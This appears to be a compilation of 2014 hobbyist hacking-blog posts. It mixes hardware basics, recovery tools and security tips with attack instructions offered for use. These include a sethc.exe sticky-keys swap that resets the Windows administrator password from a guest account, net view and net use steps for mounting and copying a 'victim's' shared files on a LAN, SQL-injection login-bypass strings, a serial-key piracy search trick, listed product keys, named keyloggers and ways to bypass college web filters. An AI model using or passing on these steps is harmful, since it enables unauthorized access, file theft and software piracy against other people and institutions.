First Level :- Security SSL or 256 bit secured
connection
Second Level : - Facebook login script checks
for cookie in the system of user. If available
then it validates the cookie and update the
cookie path and timestamps and its expiry
interval.
Third Level -: Facebook provides a
redirection to the entered User information
to their profile area.
Fourth Level : - Facebook doesn’t use
conventional php/aspx/asp coding rather it
uses Client side Ajax Scripting with oAuth 2.0
protocol. So it is almost impossible to hack
Facebook using input validation attack!!!
It is not an easy task to hack Facebook by
breaking its security! But still some hackers
manage to get access to other’s Facebook
accounts.

Top Ways to Hack Facebook Accounts........

1.Keylogger:~
Using keyloggers is one of the Easiest Way to
Hack an Facebook (or any other email)
password. Keylogger programs can spy on
what the user types from the keyboard. If
you think that you can just uninstall such
programs, you are wrong as they are
completely hidden.
A keylogger, sometimes called a keystroke
logger, key logger, or system monitor, is a
hardware device or small program that
monitors each keystroke a user types on a
specific computer’s keyboard. Keylogger is
the easiest way to hack an Facebook account.
A keylogger program is widely available on
the internet. Some of the best ones are listed
below
Vicspy KeyloggerKGB KeyloggerSniper
SpyArmadax Keylogger
PROTECTION : Use the Web Browser Mozilla
Firefox and Download the ADD ON called
Keyboard Scrambler.
GOTO TOOLS --->ADD ONS ----> Type "Key
Scrambler" (without Quotes) in the search
box and then click OK. Install It and restart
Firefox.
Now all keyloggers are a piece of waste and
Keyboard Scrambler Encrypts your
Keystrokes....
READ MORE AT => Protect Yourself From
Keyloggers Using Keyscrambler
2.Phishing:~
Phishing Attack is the most popular way of
hacking/stealing other’s password. By using
fake login pages it is possible to hack
Facebook. Here the users land on a page
where they are asked for their login
information and they enter their Facebook
username and password thinking it to be a
real page but actually it is other way round.
It submits all the entered details to the
creator of the fake login page.
PROTECTION : Use Any of the Surf Sheilds
either by AVG websheild or any other
Security toolbar Or any other Antiphising
tool. You can use other famous Antivirus
Addon.
READ MORE AT => Protect Yourself From
Phishing
3.Facebook New Features:
Resently i saw a that looks like they are
giving the user a choice of selecting new
features for Facebook with your ID and
password, of course!! When the user
submit’s his/her Facebook login information
through this page, there goes his ID and
password mailed to the coder.
Protection :
If you install a New Application or Joined any
Facebook Page on Facebook Or Installed an
New Theme and Its Asking For username and
Password then its a Fake and Phishing attack.
Don't Login if any third party product is
asking for login.
4.Facebook Apps:
Many times you are provided with a link to a
Facebook app in a message. Always read the
links carefully, It may be something like
http://www.faceb0ok.com/app?p=123abcd
Faceb0ok not Facebook or can be some
hidden link that i explained in my previous
article of clickjacking.
Protection :
This is definitely a trap created by the hacker
to hack your Facebook password. Clicking on
this link will take you to a fake login page
and there you loose up your password.
5. Java script:
You must have seen the circulating messages
that asks you to paste this code in your
address bar and see what happens! Well
sometimes they also leak out your
information. Check the code and if you are
unsure of what to do, then I recommend not
to use it. So be careful, javascripts can even
be used to hack Facebook!
These type of tricks and hacks are blocked by
Facebook as soon as they are detected. So
you need not to worry about It. But Try to
avoid Use of javascripts as far as possible
because no one knows you maybe among the
few ones who become prey to that script.
6. Primary mail address:
If by some means a hacker came to know the
password of your Yahoo mail or Gmail, which
users normally keeps as their primary mail
address in their Facebook account, then
hacker can hack Facebook account by simply
using USER ID and clicking on ‘forget
password’. This way Facebook will send link
to the already hacked primary email ID to
change the password of the Facebook
account. Hence the email hacker will change
your Facebook account’s password. Hence
your, Facebook account is hacked too.
So a better thing would be to keep a very
unknown or useless email ID of yours as
primary email id so that if the hacker clicks
on ‘Forgot password’ the password changing
link goes to an unknown email id i.e. not
known to the hacker. Hence your Facebook
account saved.
I hope You can understand what i give info.
And Always remember there is no Facebook
Software that Can Hack Account All are to
Hack you.

How to access blocked websites at college?

Browsing blocked sites is an issue for all
college students and that is what raises the
question in our minds, How to access
blocked sites at college? It is really irritating
when you type “facebook.com” -> “Enter” and
get an error message saying “You are not
allowed to visit this website”. Well, this
common problem has many solutions to it.
The method of browsing blocked sites can be
achieved if you bypass blocked sites. Now,
what do we mean by ‘bypass blocked sites‘?
IT means that you go around the firewalls of
the blocked sites in order to gain their
access. Here is my compilation of the
alternative ways of browsing blocked sites-
1. Use IP in the address bar in place of URL
This is the easiest and most common method
to bypass blocked sites. But, this method
depends upon how your college is blocking
certain sites. If the college is using domain
name of sites in its list of blocked sites, then,
this method will work for sure.
Steps – Press “Windows key + R”
- Type “cmd” and press Enter
- Now, if you wish to visit “youtube.com”,
then, write “ping youtube.com”
- You will get the IP address of Youtube as
“74.125.135.93″
HOW TO ACCESS BLOCKED SITES
- Now, go to your browser and type this IP
address in address bar. And, BINGO, you get
the first answer of how to access blocked
sites at college!!!
2. Google Cache
The webpages are stored in cache form by
Google. So, clicking on the ‘Cached’ link in
Google’s search results, you can open
Google’s version of the webpage and bypass
blocked site that you were trying to visit.
3. Wayback Machine
It is basically a database of all the websites
on the internet. Wayback Machine keeps the
log of all websites since the time they were
started. So, you can go to Wayback Machine’s
search engine and access blocked sites. A
very easy answer of how to access blocked
sites at college indeed.
4. Use of redirected short URLs
Many a times, a certain URL of the site (the
common URL) is blocked. So, using
shortened URLs also, you can open them up.
Shortening of URLs has already been
discussed on our blog.
5. Webpage retrieval using Mails
There is a service on the internet that sends
you the websites directly into your mailbox.
It’s called Web2Mail. All you need to do is,
type the desired URL in the subject title, then
send the mail to www@web2mail.com and
you are ready toaccess blocked sites.
6. Use of Proxy Servers
You can also use Proxy Surfing in order to
access blocked sites. Proxy Surfing is a
simple method in which we access blocked
website through its proxy server.How to
access blocked sites at college via proxy
servers is very easy, e.g. just follow the steps
given below:
In Chrome, first go to “Settings” -> Click
“Advanced Settings” -> click “Show Advanced
Settings” in Network.
proxy1
After that click “Lan Settings”
How to access blocked sites at college by
proxy
Now, check the “Use Proxy Server for your
Lan” checkbox -> Type the desired address
and then Click “Ok”.
Accessing blocked sites at college by proxy
7. Using Google Translate
It’s an amazing technique in which you make
a fool of translation sites like Google
Translate. These sites allow you to surf the
translated version of the desired website
inside their page. So, you just have to Double
Translate your blocked website in order to
browse it.
With these amazing techniques out here,
accessing blocked sites in college becomes a
cakewalk. Let the authorities take any step
they want, no one, yes no one can stop us
bypass blocked sites that we want to visit. I
do hope you must have now understood how
to access blocked sites at college, so go and
have fun!!

Data recovery softwares for windows

Below are some Free and Effectivly Working
Tools that will help you, i will be also
providing the link to downoad this Softwares
for free from thier official sites.
1)Recuva is one of the most popular and
powerful file recovery tool for Windows. It
has a very sleek and clean interface. You will
find it very easy to navigate to different
modes and options. You can pick up files to
recover from a list of file paths, including
Pictures, Music, Documents, Video, and
Compressed files.
It can quickly scan your files and gives
detailed information of your files. It’s very
easy to recover selected files by clicking the
recover button. After recovering it gets saved
to the location you specify. The publisher’s
website has a forum where you can ask for
help if you require. This is the Software that i
will Recommend you to Download
Download Recuva
2)Undelete 360 is the free version of a
commercial product, and so leaves out some
useful features (file filtering, previews and so
on). These still appear in the interface,
though, and suggest you upgrade if you ever
click on them, which can be annoying.
There are no restrictions on the amount or
size of the files you can recover, though, and
otherwise the program is very simple to use:
point it at a drive, it'll scan for deleted files,
then you can view particular file types (JPGs,
PDFs, videos and more) by choosing them
from a tree.
Scanning speed isn't great, but Undelete 360
can recover files that other programs miss ,
and so it's definitely worth considering.
Download Undelete 360
It's hard to imagine how any undelete tool
could be simpler than
3)Wise Data Recovery .
There are no menus, no complicated options
or dialog boxes: all you do is choose a drive,
click Scan, and wait as the program locates
any deleted files.Select what you need, click
Recover, and that's just about it
Wise Data Recovery doesn't seem to work with
FAT-based drives, though, recovering nothing
from our test USB drive. It's only free for
personal use, too. But if you just need
something quick and easy to recover files
from NTFS drives then it should probably be
on your shortlist.
Dowload Wise Data Recovery
4)Pandora is another powerful data recovery
software for Windows. It helps you in
recovering lost, deleted or damaged files from
your system.
You can recover data from hard drive, USB
drive, network share or other places. The data
recovery process is very easy, just follow the
wizard and its instructions.
Download Pandora Recovery
5)Glary Undelete can recover files from hard
drives and any removable media you might
have including memory cards, USB drives,
etc.
The biggest advantages in Glary Undelete
include the easy "Folders" view, a Windows
Explorer-style view of recoverable files, and a
prominent "State" indication for each file,
suggesting how likely a successful file
recovery will be.
One disadvantage of Glary Undelete is that
installation is required before you can use it
and it asks you to install a toolbar, which you
can of course decline. Aside from those facts,
Glary Undelete is top notch.
Download Glary Undelete
So these were the 5 useful tools that will help
you to Recover your Deleted Data, Let us
know which one works well for you, or If you
are using any other data recovery software
then feel free to share it with us in Comments
below

Friday 18 July 2014

Computer literacy basics

Easy Learn Computer will discuss about
computers ranging from the most basic.
Before going on to further yahap is useful to
know the basic computer first. In this case
the basic knowledge to be learned about the
introduction of Hardware and Software.
HARDWARE
Computer hardware can be divided into
several parts :
CPU (Central Processing Unit)
Input Device
Output Devices
Storage Device
CPU (Central Processing Unit)
The CPU is the most important part of a
computer. In it there is a lot of hardware to
connect and work processes input devices and
send the results to the Output Device. CPU
Unit consists of: main board, processor,
RAM / Memory, Power Supply, Input / Output
Controller, Display Controller, Multimedia
Controller, Network Controller.
Main board
Main board serves to put the whole device
controllers. Including Processor, RAM, Power
Supply, I / O Controller, Display Controller
and all the equipment is placed in the socket
provided by the main board. Manufacturer
Main board: Asus P5Series, AMPTRON,
Compaq, Chip PC, Gigabyte, ECS, Dell, IBM
Processor
Processor is the brain of the computer, such
as the human brain in all commands and
command results in the process by the
Processor. The processor is a chip that is
often called "Microprocessor" which is now
the size has reached Gigahertz (GHz). The
measure is a matter of the speed of the
processor to process data or information.
Part of Processors the most important part of
the processor that is divided into three:
Arithmetic’s Logical Unit (ALU) Control Unit
(CU) Memory Unit (MU) The more velocity and
higher processor technology, the better the
performance of the computer.
Interface = Socket 370 (P-3), Socket 478
(P-4), Socket A / B (AMD), PGA 778 (Dual Core
and up) For example, Intel P1, P2, P3, P4,
Dual Core, AMD Duron, Athlon, etc.
Manufacturers processors are widely
circulated in the market are AMD, Apple, VIA
Cyrix, IBM, IDT, and Intel.
RAM / Memory
Random Access Memory file storage program
executed by the computer functions. The
greater the capacity, the more closely the
process as well. My experience with the
system Windows XP CPU will be very
responsive to 2:00 GHz with 512MB RAM.
Type / Interface = EDO (oldest), SDRAM, DDR1,
DDR2, DDR3 (newest, fastest, cheapest)
Power Supply
Power Supply serves as the resources used to
use all the tools available on the computer.
Recommendations When Power Supply for
your computer is one that has great power,
better computer power advantages.
Pin Type: 12 Pin Interface (old type), 20 Pin
ATX, ATX 20 Pin + 4 Pin, ATX 24 Pin + 4 Pin
(Latest)
I / O Controller
Controller to manage devices connected to
the I / O ports (Port Serial, PS2, LPT).
Examples of devices that connect to the PS2
Mouse, Keyboard P2, Printer LPT.
Interface = ISA, PCI
IDE controller and SCSI
Controller
The controller is to manage the performance
of the devices connected to the IDE or SCSI
port. The tools are used to connect hard
drives, floppy disks, CD Rom.
Interface = ISA, PCI
Display Controller
Display Controller to produce a display to a
monitor or TV. There are two types of the first
on board, both are often called VGA Card.
VGA has its own RAM larger capacity, greater
RAM then the display on the monitor will be
more subtle. VGA Card also serves to reduce
load performance RAM / Memory on the use
of certain 3D games, 3D video, and programs
that require high-resolution graphics.
Example RAM VGA: 16, 32, 64, 128, 224, 256,
512, 1G.
Interface = ISA (Old Type), PCI (Old Type),
AGP, PCI-Express (New)
Manufacturer VGA: Nvidia, S3 Trio, SIS, ATI
Rage Series, etc.
Multimedia Controller
Multimedia Controller for producing sound
often called a Sound Card (Sound). Sound
Card Technology Today technology developed
to support 3D Surround 5.1 (mean 5 speakers
with 1 Central as Base 6 Channel).
Manufacturer: Realtek, CMedia, ESS, Creative
Sound Blaster. Interface = ISA, PCI
Network Controller / Network
Adapter / LAN Card
Network Controller / Network Adapter / LAN
Card are used as a port that connects two or
more computers. Usually used for Chat, File
Transfer, Database Programs, internet access
(if using a modem), Multi Player Games, etc.
Interface = ISA, PCI
INPUT DEVICE
Device used to enter commands.
Keyboard
This tool is to include input ASCII characters
to be translated so that the system will
generate an order.
Port Interface = Serial / PS2 / USB
Mouse
This tool is a pointing device (pointer) that
will help to access the computer.
Port Interface = Serial / PS2 / USB
Scanner
This tool will convert real image into Image
File (File Photo)
Port Interface = LPT / USB
Joystick
This tool as a game controller.
Port Interface = LPT / USB
Output Devices
That tool works issued the results of a
command input device.
Monitor
To display the results of the CPU.
Printer
As a means of printed documents. 1. Laser
printers, this printer to print quality
documents the approach documents have
been processed in a computer. 2. Ink-jet
printers, laser printers compared to New
Media, the initial cost of the printer type
more efficiently. 3. Dot matrix printer, this
being the most preferred type ON PC era. In
this type of printer, the image produced by a
collection of the check point spread short
distances so it looks uneven. 4. Plotter,
printers use a pen set to make World Prints
related engineering or architecture.
Manufacturer : Canon, Epson, HP, Lexmark,
Apollo, etc. Port Interface = LPT, USB
Speaker
As the sound output device. We can also use
earphones.
Storage Device
That the tool serves as a place to store data in
a file.
Fixed Hard disk / Hard Disk
Chasing placed inside the CPU, is used to
store files in a very large capacity. At present,
the production capacity of hard disk storage
has reached more than 512 GB.
1KB = 1024 B
1MB = 1024 KB
1GB = 1024 MB
For example, file documents / letters usually
only takes 200kb, 4MB MP3, Video CD
50MB / song, 700MB / CD full.
Interface = IDE, SCSI, SATA Manufacturer:
Samsung, Maxtor, Seagate
Floppy disk Drive
Floppy disk drive is the additional storage
that can be moved - moved / not fixed,
including the Removable disk. Since capacity
is only 1.44 MB floppy disk now abandoned
and turned to flash a current capacity up to
8GB, safer and maintenance free.
Interface = floppy interface
Manufacturer: Panasonic, Samsung
CD / DVD Drive
Used as a media reader CD (Compact Disk /
Disk tile) or a DVD. CD / DVDRW can be used
to read the CD / DVD, and burn to CD / DVD.
The storage capacity of a standard 700MB CD,
DVD 1 Layer 4.48 GB, 8.15 GB DVD 2 Layer.
Interface = IDE, SCSI, SATA
Manufacturer: Samsung, Liteon, LG, Pioneer
Other Device (Other Devices)
Flash Disk
Flash Disk is also included in the Storage
Device, floppy disk the same function, but
has a large capacity and maintenance free. My
experience using a floppy disk is very
uncomfortable and unsafe, because it must be
protected from dust, sunlight, water,
magnets, etc. A common mistake because
unreadable. Flash disk capacity from 512,
1GB, 2GB, 4GB, 8GB and growing.
Interface: USB
Bluetooth Adapter
This tool converts the digital data into a
particular frequency radio signals to connect
with other tools such as HP, other PCs,
Bluetooth Mouse, Bluetooth Speaker, etc.
Interface: USB
TV Tuner
This tool serves to convert the RF signal (TV
signals) into digital signals. With this tool for
watching TV on the computer is not a
problem. Usually equipped with a radio.
Interface: PCI / USB
External Hard Drive
Function and capacity similar to a fixed disk /
hard drive. The difference this device can be
taken anywhere, because it includes the
Removable Disk.
Interface: USB
SOFTWARE
Software is a program, device drivers, and
files on the computer. Namely;
Operating System (OS)
The operating system is the software that
controls the performance of the main system.
In determining the OS to consider the
compatibility (support for programs to third
parties, as well as support for hardware),
stability (Often Mistake or not), and Price
Range (OS Windows XP Home Edition for
dollar cost nearly 800ribu, Linux offers a free
OS such as Ubuntu).
Example OS, DOS 6.22, Windows 3.11,
Windows 95, 97, 98, 2000 Server, XP, 2003,
Vista, Linux Mandrage, Linux Ubuntu, Suse
Linux, etc.
Program Application
The application program is a supplemental
program to support the performance of the
computer. (Price Software Microsoft Office
Word, Excel Access to 1.7 million). Example
Applications, Office (Word, Excel, etc.),
Winamp, Power DVD, Pascal, Application
Games, etc.
Device Driver
All the hardware described above will not
work without a Device Driver is installed in
the Operating System. For example, the
printer cannot print without a Device
Driver. For Exsample : Suppose we want to
install a TV tuner card installed in the PCI
slot. Once the computer is turned on it will
be confirmation that the new hardware found
and then the computer asks Device Drivers for
new hardware. This could mean that the
computer wants to know what the name, the
function and workings of the new hardware
and ask identifier wheel / in the form of
software (usually included in the package
tool). After we gave the driver files in the
form of software, the computer will know that
the name of this tool is the TV Tuner, Brand
A, mounted on a PCI-X slot, and so on.
However, the operating system has been
equipped with many hardware-hardware
drivers that are often used in PCs. If we put a
new tool to the computer then the tool is
ready for use, it is called Tool Compatible.
Stay updated drivers so we can work
optimally. For example, flash, LX-300 Printer,
Monitor.

Thursday 17 July 2014

How to find serial key of any software

1) Go to Google.com
2) Then type Software Name 94FBR
3) Replace Software Name with the name of
software whose serial key you want to find
4) Example: To find serial key of Nero i will
type Nero 94fbr
5) Now press Enter and you will find serial
key

Sunday 13 July 2014

Convert Your laptop Webcam into Security

Yes now you can convert your wecam into
security cam , with the help of # BootCam
software its a freeware software .
now whenevr you start your laptop, it
capture a picture from your webcam and
save it into "Souce" directory with the
current date and time,
you can check who were accessing your
laptop behind you!!
pls follow these step to install BootCam--
Step-1 Download BootCam(Not available on
net) totally devloped by Hacking iN team if
you need it then contact us.
Step-2 after downloading Paste "BootCam"
Folder into C:/ drive(Not mandtory , you can
paste,where you want)
Note that- it does not hav any installation
wizard(wizard is under devloping mode)
Step-3 Copy load.exe file and paste shortcut
into startup folder of windows(Start->all
programe->statup)
Now Goto to the BootCam Directory Look for
"Source" Directory , it cantain all of pic
which were capture at the time of startup.

Security Tips for Beginners :

***********************************
1 : Do not open links and files received from
un-trusted people.
2 : Do not open junk emails that you
received on your gmail, yahoo, hotmail or
any other source.
3 : Always use the latest version of Anti-Virus
and keep it up-to-date in Windows OS.
4 : if you are using linux/ubuntu or any
other linux based operating system then you
don't need anti-virus. just open your
terminal and enable firewall by entering this
command
sudo ufw enable
5 : Remember, Once your account is Hacked,
it can not be recovered easily, so follow the
tips below related to your accounts.
6 : To secure your facebook accounts use
your mobile number as an extra layer.
7 : Never use same passwords for your
primary e-mail and for your facebook
account. it will help you in Recovering your
account.
8 : Change your passwords after 1 month on
regular bases if you have joined Hacking
groups and pages.
9 : Be careful in getting auto-likes etc from
websites.They might give you a trouble.
10 : Do not install un-official apps/games in
your facebook , because they sometimes are
created to Hack accounts.

Saturday 12 July 2014

HOW TO PROTECT UR SITE FROM SQLi

This is simple tutorial for beginners on
how to protect your site against SQL
Injection and this
tutorial will also help you check if your site
is vulnerable
to SQLi and how to make it resistant to SQLi.
What is SQL Injection?
SQL stands for Structured Query Language,
and it is the language used by most website
databases. SQL Injection is a technique used
by hackers to add their own SQL to your
site’s SQL to gain access to confidential
information or to change or delete the data
that keeps your website running. I’m going to
talk about just one form of SQL Injection
attack that allows a hacker to log in as an
administrator – even if he doesn’t know the
password.
Is your site vulnerable?
If your website has a login form for an
administrator to log in, go to your site now,
in the username field type the administrator
user name.
In the password field, type or paste this:
x’ or ‘a’ = ‘a
If the website didn’t let you log in using this
string you can relax a bit; this article
probably doesn’t apply to you. However you
might like to try this alternative:
x’ or 1=1–
Or you could try pasting either or both of
the above strings into both the login and
password field. Or if you are familiar with
SQL you could try a few other variations. A
hacker who really wants to get access to
your site will try many variations before he
gives up.
If you were able to log in using any of these
methods then get your web tech to read this
article, and to read up all the other methods
of SQL Injection. The hackers and “skript
kiddies” know all this stuff; your web techs
need to know it too.
If you were able to log in, then the code
which generates the SQL for the login looks
something like this:
$sql =
“SELECT * FROM users
“WHERE username = ‘” . $username .
“‘ AND password = ‘” . $password . “‘”;
When you log in normally, let’s say using
userid admin and password secret, what
happens is the admin is put in place of
$username and secret is put in place of
$password. The SQL that is generated then
looks like this:
SELECT * FROM users WHERE username =
‘admin’ and PASSWORD = ‘secret’
But when you enter x’ or ‘a’ = ‘a as the
password, the SQL which is generated looks
like this:
SELECT * FROM users WHERE username =
‘admin’ and PASSWORD = ‘x’ or ‘a’ = ‘a’
Notice that the string: x’ or ‘a’ = ‘a has
injected an extra phrase into the WHERE
clause: or ‘a’ = ‘a’ . This means that the
WHERE is always true, and so this query will
return a row contain the user’s details.
If there is only a single user defined in the
database, then that user’s details will always
be returned and the system will allow you to
log in. If you have multiple users, then one
of those users will be returned at random.
How to resist against SQLi
Fixing this security loophole is not so
difficult. There are several ways to do it. If
you are using MySQL,, the simplest method
is to escape the username and password,
using the mysql_escape_string() or
mysql_real_escape_string() functions, e.g.:
$userid = mysql_real_escape_string($userid);
$password = mysql_real_escape_string
($password);
$sql =
“SELECT * FROM users
“WHERE username = ‘” . $username .
“‘ AND password = ‘” . $password . “‘”;
Now when the SQL is built, it will come out
as:
SELECT * FROM users WHERE username =
‘admin’ and PASSWORD = ‘x\’ or \’a\’ = \’a’
Those backslashes ( \ ) make the database
treat the quote as a normal character
rather than as a delimiter, so the database
no longer interprets the SQL as having an OR
in the WHERE clause.
This is just a simplistic example. In practice
you will do a bit more than this as there are
many variations on this attack. For example,
you might structure the SQL differently,
fetch the user using the user name only and
then check manually that the password
matches or make sure you always use bind
variables (the best defence against SQL
injection and strongly recommended!). And
you should always escape all incoming data
using the appropriate functions from
whatever language your website is written in
– not just data that is being used for login.

What is God Mode And How To Activate It In Windows 7 ???

To Activate God Mode :
Follow these simple steps to enable God
Mode :-
Make a New folder on your desktop.
Name it as ”God-Mode.
{ED7BA470-8E54-465E-825C-99712043E01C}”.
God mode is a feature in Windows 7 which
gives you total access to all your computers
Administrative Settings. This feature lets
users access all of the operating system’s
control panels from within a single folder.
God Mode is a simple folder that brings all
aspects of Windows 7 control in a single
place. It collects all of the Control Panel
functions, interface customization,
accessibility options, just about every aspect
of controlling Windows 7 into a single place

Friday 11 July 2014

Tips to recover scratched CD's

1. Spread a cloth on a flat surface and
place the CD on it.
2. Then, hold the disc with one hand, use
the other to wipe the polish into the
affected area with a soft cloth.
3. Wait for it to dry and buff using short,
brisk strokes along the scratch, not across
it.
4. A cloth sold to wipe spectacles or
camera lenses will work super m8's.
5. When you can no longersee the
scratch,, wash the disc with water and let
it dry before playing. Intersting isnt it? Try
it right now
I have used toothpaste with good effects
before Ive also used car paint cutting
compound on deeper scratches. It does
leave lots of smaller scratches (as it is a
cutting compound after all) but it will
remove the worst scratches in most cases.
ya u r gng to b surely befinited by this
Operation
* Fingermarks/prints cause 43% of disc
problems!
* General wear & tear causes 25% of disc
problems!
* Player-related issues cause 15% of disc
problems!
* Remaining Othersg

Thursday 10 July 2014

How to remove virus using cmd ( command prompt ) ?

Hello people messing up with some nuissance virus ?
Though your antivirus software removes
virus and problem persists, searching google
for the removal and you are into a perfect
site for a solution. Here's a trick to remove
all your viruses. Follow the steps given below
to remove viruses using cmd ( command
prompt ) .
How to remove autorun virus using cmd ?
How to remove autorun virus from Hard disk
using command prompt?
Steps :
Press ( Start or winkey ) -> Run -> cmd.
If you are at the root directory ( C drive )
then do the following, else give cd.. and
come to the root C:\> and do the following.
Type in ( attrib -h -r -s autorun.inf ), without
brackets and press Enter.
Type ( del autorun.inf ), without brackets and
press Enter.
Follow this for all other drives.
How to remove Shortcut virus using cmd ?
These Shortcut viruses are those which
converts all your data inside your pen drive
or Hard disk to shortcuts, and which are
recoverable.
Just follow the below given steps to remove
shortcut virus from pen drive and recover
back your files.
Go to Start -> Run -> cmd.
Go to your pen drive directory.
Type this command: del *.lnk and press
Enter.
Type attrib -h -r -s /s /d e:\*.*
And then press a gentle Enter.
How to remove shortcut virus in Pen drives
in Windows ?
Recover your files :
You can recover your files through Winrar.
Open WINRAR Application.
Navigate to your Pendrive location or PC
Folder location.
Copy Files and Paste where you want.
Format your Pendrive.
How to remove empty Folder virus using
cmd ?
Got some Files in your pen drive but they are
empty! Because of the virus in your pendrive
malfunctions your drive. How to remove this
empty folder virus and recover files? Follow
the steps given below.
Start -> Run -> cmd.
Type this command: attrib -h -r -s /s /d x:
\*.*
Here the letter "x" should be replaced with
the drive alphabet of your pendrive that you
have inserted into the computer.
If your pendrive shows the drive alphabet as
"J", then type this command: attrib -h -r -s /
s /d j:\*.*
And then press a gentle Enter.
Note:
Do a restart, and before that don't open any
drives after performing the following steps.

Windows 8 product key

Windows 8 product key, the product key is
unlikely able to be used to install or upgrade to
Windows 8.1. Hence you will need the following
product key to initiate the install or upgrade:
Windows 8 (core): 334NH-RXG76-64THK-
C7CKG-D3VPT
Windows 8 Pro: XHQ8N-C3MCJ-RQXB6-WCHYG-
C9WKB
Windows 8 Enterprise: MNDGV-M6PKV-DV4DR-
CYY8X-2YRXH
FHQNR-XYXYC-8PMHT-TV4PH-DRQ3H

HOW TO KNOW ADMIN PASSWORD THROUGH GUEST ACCOUNT

1) Go to C:/windows/ system32.
2) Copy cmd.exe and paste it on
desktop.
3) Rename cmd.exe to sethc.exe.
4) Copy the new sethc.exe to system
32,when windows asks for
overwriting the file,then click yes.
5) Now Log out from your guest
account and at the user select
window,press shift key 5 times.
6) Instead of Sticky Key confirmation
dialog,command prompt with full
administrator privileges will open.
7) Now type “ NET USER
ADMINISTRATOR “zzz” where “zzz”
can be any password you like and
press enter.
8) You will see “ The Command
completed successfully” and then
exit the command prompt and login
into administrator with your new
password.
9) Bravo !! Now You have hacked
admin through guest account

Monday 7 July 2014

Top 8 Websites for hackers

1. Hack a day
This website contains news, projects, videos,
forums and some other information on
hacking, which can all come in handy if you
are or want to be a hacker.
http://hackaday.com/
2. Security Focus
This website has been running since 1999
and carries information from news to posts
by experts and guest columnists, all of them
related to security.
http://www.securityfocus.com/
3. Astalavista
This website tells you how vulnerable your
system is and gives you information on your
websites and overall assets.
http://www.astalavista.com/
4. PacketStorm Security
Their tagline says, "What you don't know can
hurt you," and they try to avoid just that by
bringing news, information and tools that
can help protect personal and enterprise ad
data.
http://packetstormsecurity.com/
5. Black Hat
This company has been operating for over 15
years and has been at the forefront of
security-related events all around the world.
They conduct briefing, training and many
other activities.
http://www.blackhat.com/
6. Metasploit Project
This is one of the most popular penetration
testing tools, which is used by people all
around the world. The software has been
created by an open source community along
with Rapid7.
http://www.metasploit.com/
7 Insecure.org
This is a website where you can find a list of
125 security tools and various other
information ta
http://sectools.org/
8. 2600 Store
This website gives you information on
hacking. news and many other useful
resources related to hacking/.
http://2600.com/

Tuesday 1 July 2014

How to hack a computer in ur local network area and copy all files

step 1
go to command prompt and type cmd and type
net view this command will show all the
computers that are connected to your network
step 2
then type tracert "the name of the computer"
this will give u the ip of the victim, or u can
simply use an ip scanner to get the victim ip
step 3
type nbtstat -a "ip address" eg: nbstat -a
10.0.33.79 and hit enter; if the result shows a
value of 20 you can proceed if not get the hell
out of there.
step 4
type net view \\ "ip" eg:net view \\10.0.33.79
and hit enter this will show you the folders >
drivers which u shared by the victim
step 5
now type net use L: \\ip\the file which he
shared eg:net use L: \\10.0.33.79\Users (i have
given "L" is just for an example you can give
any letter except the driver names whichare
not in the computer like C,E.D,F)and hit enter
if the command completed succesfully go to
my computer there you will see a new drive
which is of the name of the ip now you can
explore it and can do anything